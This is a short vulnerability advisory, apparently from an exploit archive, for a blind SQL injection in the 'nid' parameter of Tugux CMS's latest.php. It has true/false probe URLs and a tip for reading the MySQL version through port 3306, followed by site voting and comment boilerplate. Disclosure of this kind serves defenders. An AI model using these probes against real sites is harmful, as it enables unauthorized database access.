Tugux CMS Blind SQL Injection

2011.03.21

Credit: eidelweiss

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

===================================================================
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
References: http://eidelweiss-advisories.blogspot.com/2011/03/tugux-cms-nid-blind-sql-injection.html
===================================================================
exploit & p0c
[!] latest.php?nid=[valid nid]
Example p0c
[!] http://server/latest.php?nid=9 <= True
[!] http://server/latest.php?nid=-9 <= False
[+] http://server:3306 <= download the file , save and open with c++ or wordpad will show mysql version
[!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Tugux CMS Blind SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.